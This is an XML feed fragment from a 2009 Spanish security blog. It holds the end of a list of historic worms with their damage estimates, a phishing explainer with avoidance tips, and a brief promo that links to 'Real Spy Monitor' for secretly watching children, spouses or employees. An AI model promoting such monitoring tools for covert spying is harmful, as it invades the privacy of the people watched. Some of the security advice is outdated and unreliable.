/&gt;Daños: Más de 10 billones de dólares.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Sobig (2003)&lt;/strong&gt;&lt;br /&gt;Es un gusano que se extiende a través de email y de unidades compartidas de red.&lt;br /&gt;Origen: Aún no determinado.&lt;br /&gt;Daños: De 5 a 10 billones de dólares.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Bagle (2004)&lt;/strong&gt;&lt;br /&gt;Es un virus que se propaga de forma masiva a través del correo electrónico y contiene un componente de acceso remoto.&lt;br /&gt;Origen: Aún no determinado.&lt;br /&gt;Daños: Decenas de billones de dólares y aún sumando.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;MyDoom (2004)&lt;/strong&gt;&lt;br /&gt;Gusano que se propaga a través del correo electrónico en un mensaje con características variables y a través del programa de ficheros compartidos (P2P) KaZaA.&lt;br /&gt;Origen: Aún no determinado.&lt;br /&gt;Daños: LLego a reducir el desempeño de Internet en 10% y el tiempo de carga de de la WWW en 50% por varias horas.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Sasser (2004)&lt;/strong&gt;&lt;br /&gt;Gusano que para propagarse a otros equipos, aprovecha la vulnerabilidad en el proceso LSASS (Local Security Authority Subsystem). Sólo afecta a equipos Windows 2000/XP y Windows Server 2003 sin actualizar.&lt;br /&gt;Origen: Alemania&lt;br /&gt;Daños: Decenas de millones de dólares.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-7925077452243928655?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/7925077452243928655/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/los-virus-mas-peligrosos-famosos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7925077452243928655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7925077452243928655'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/los-virus-mas-peligrosos-famosos.html' title='Los virus más peligrosos, famosos, dañinos de la historia'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-8408141582736546787</id><published>2009-09-10T15:49:00.000+02:00</published><updated>2009-09-10T15:51:30.348+02:00</updated><title type='text'>Real Spy Monitor 2.86 Full</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_mFMUaCwtbag/SqkEVQU0lbI/AAAAAAAAABA/TZwXovXWDc8/s1600-h/hrd4if.png"&gt;&lt;img style="cursor: pointer; width: 320px; height: 218px;" src="http://1.bp.blogspot.com/_mFMUaCwtbag/SqkEVQU0lbI/AAAAAAAAABA/TZwXovXWDc8/s320/hrd4if.png" alt="" id="BLOGGER_PHOTO_ID_5379835993076831666" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Preocupado por la forma en que su PC se está utilizando? Quiere mantener las pestañas sobre sus hijos, cónyuge, los empleados? Necesidad de prevenir que sus hijos o empleado de alguna aplicación o los sitios web? Real Spy Monitor es la solución para usted.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.brothersoft.com/real-spy-monitor-download-63804.html"&gt;descarga:&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-8408141582736546787?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/8408141582736546787/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/real-spy-monitor-286-full.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8408141582736546787'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8408141582736546787'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/real-spy-monitor-286-full.html' title='Real Spy Monitor 2.86 Full'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mFMUaCwtbag/SqkEVQU0lbI/AAAAAAAAABA/TZwXovXWDc8/s72-c/hrd4if.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2110119270421853445</id><published>2009-09-09T13:43:00.000+02:00</published><updated>2009-09-09T13:57:22.452+02:00</updated><title type='text'>¿Que es phishing?</title><content type='html'>Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea[1] o incluso utilizando también llamadas telefónicas.[2]&lt;br /&gt;&lt;br /&gt;Dado el creciente número de denuncias de incidentes relacionados con el phishing se requieren métodos adicionales de protección. Se han realizado intentos con leyes que castigan la práctica, campañas para prevenir a los usuarios y con la aplicación de medidas técnicas a los programas.&lt;br /&gt;&lt;br /&gt;1.-Como evitar el phishing.&lt;br /&gt;&lt;p class="blurb"&gt;La técnica del phishing utiliza el correo electrónico para ponerse en contacto con los usuarios, utilizando mensajes que imitan, casi a la perfección, el formato, lenguaje y la imagen de las entidades bancarias/financieras, y que siempre incluyen una petición final en la solicita a los usuarios la “confirmación” de determinados datos personales alegando distintos motivos: problemas técnicos, cambio de política de seguridad, posible fraude, etc...&lt;/p&gt;&lt;p class="blurb"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="blurb"&gt;Estos mensajes de correo electrónico siempre incluyen enlaces que conducen “aparentemente” a las páginas web oficiales de las citadas entidades pero que, en realidad, remiten a “páginas web piratas” que imitan o copian casi a la perfección la página web de la entidad financiera, siendo su finalidad principal captar datos de los usuarios.&lt;/p&gt;&lt;p class="blurb"&gt;1.-Una forma de evitarlo es copiar el enlace y abrirlo en el navegador, no pinchar directamente el link.hacerlo de forma local.&lt;br /&gt;&lt;/p&gt;&lt;p class="blurb"&gt;2.-Otra forma es observar el nombre de la pagina que se abre  , un ejemplo si os mandan un correo de un banco, al abrir la direccion en el naveador que os dicen que pincheis, la nueva direccion que se pone el navegador es muy parecida pero nunca es igual, al banco a una tienda al messenger,ect..&lt;/p&gt;&lt;p class="blurb"&gt;3.-Desconfiar de cualquier mensaje que solicite datos confidenciales como nombres de usuario, contraseñas, números de tarjeta de crédito, etc.&lt;/p&gt;&lt;p class="blurb"&gt;4.- Para asegurarnos de que conectamos con un servidor web seguro comprobar, en la barra de direcciones del navegador, que la URL comienza por &lt;a href="https:///" class="moz-txt-link-rfc2396E"&gt;"https://"&lt;/a&gt;&lt;/p&gt;&lt;p class="blurb"&gt;5.-Prestar atención al icono -como, por ejemplo, un candado cerrado en el caso de Internet Explorer-, que debe aparecer en la barra de estado inferior del navegador, informando de que conectamos con un servidor web seguro. Además, haciendo doble click sobre el icono podrá visualizarse el certificado de seguridad y comprobar su validez.&lt;/p&gt;&lt;p class="blurb"&gt;6.-Mantener el sistema puntualmente actualizado, tanto el sistema operativo, como el resto de aplicaciones, especialmente el navegador que se utilice para las transacciones electrónicas.&lt;/p&gt;&lt;p class="blurb"&gt;7.-Contar tu antivirus &lt;span style="text-decoration: underline;"&gt;&lt;/span&gt; actualizada, ya que también proliferan los gusanos, troyanos y keyloggers (o programas que capturan las pulsaciones de teclado) destinados a robar los datos de los usuarios para poder acceder a la banca electrónic
